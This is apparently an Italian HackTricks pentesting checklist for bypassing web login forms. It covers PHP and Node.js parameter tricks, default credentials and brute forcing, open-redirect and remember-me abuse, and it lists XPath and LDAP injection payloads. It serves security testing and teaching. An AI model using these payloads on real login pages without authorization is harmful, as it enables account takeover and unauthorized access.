Login Bypass

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

RootedCON è l'evento di cybersecurity più rilevante in Spagna e uno dei più importanti in Europa. Con la missione di promuovere la conoscenza tecnica, questo congresso è un punto di incontro fervente per professionisti della tecnologia e della cybersecurity in ogni disciplina.

Bypass del login regolare

Se trovi una pagina di login, qui puoi trovare alcune tecniche per provare a bypassarla:

  • Controlla i commenti all'interno della pagina (scorri verso il basso e a destra?)

  • Controlla se puoi accedere direttamente alle pagine riservate

  • Controlla di non inviare i parametri (non inviare nulla o solo 1)

  • Controlla l'errore di confronto PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Cambia il tipo di contenuto in json e invia valori json (incluso bool true)

  • Se ricevi una risposta che dice che il POST non è supportato, puoi provare a inviare il JSON nel corpo ma con una richiesta GET con Content-Type: application/json

  • Controlla l'errore di parsing potenziale di nodejs (leggi questo): password[password]=1

  • Nodejs trasformerà quel payload in una query simile alla seguente: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; il che rende il bit della password sempre vero.

  • Se puoi inviare un oggetto JSON puoi inviare "password":{"password": 1} per bypassare il login.

  • Ricorda che per bypassare questo login devi comunque conoscere e inviare un nome utente valido.

  • Aggiungere l'opzione "stringifyObjects":true quando chiami mysql.createConnection bloccherà eventuali comportamenti imprevisti quando Object viene passato come parametro.

  • Controlla le credenziali:

  • Credenziali predefinite della tecnologia/piattaforma utilizzata

  • Combinazioni comuni (root, admin, password, nome della tecnologia, utente predefinito con una di queste password).

  • Crea un dizionario usando Cewl, aggiungi il nome utente e la password predefiniti (se ci sono) e prova a forzarlo utilizzando tutte le parole come nomi utente e password

  • Forza utilizzando un dizionario più grande (Brute force)

Bypass di autenticazione SQL Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite SQL injections.

Nella pagina seguente puoi trovare un elenco personalizzato per provare a bypassare il login tramite SQL Injections:

Login bypass List

Bypass di autenticazione No SQL Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite No SQL Injections.

Poiché le NoSQL Injections richiedono di modificare il valore dei parametri, dovrai testarle manualmente.

Bypass di autenticazione XPath Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Qui puoi trovare diversi trucchi per bypassare il login tramite LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Ricordami

Se la pagina ha la funzionalità "Ricordami", controlla come è implementata e verifica se puoi abusarne per prendere il controllo di altri account.

Redirect

Le pagine di solito reindirizzano gli utenti dopo il login, controlla se puoi alterare quel reindirizzamento per causare un Open Redirect. Forse puoi rubare alcune informazioni (codici, cookie...) se reindirizzi l'utente al tuo sito web.

Altri Controlli

  • Controlla se puoi enumerare nomi utente abusando della funzionalità di login.

  • Controlla se l'auto-completamento è attivo nei moduli di password/informazioni sensibili input: <input autocomplete="false"

​​RootedCON è l'evento di cybersecurity più rilevante in Spagna e uno dei più importanti in Europa. Con la missione di promuovere la conoscenza tecnica, questo congresso è un punto di incontro fervente per professionisti della tecnologia e della cybersecurity in ogni disciplina.

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Last updated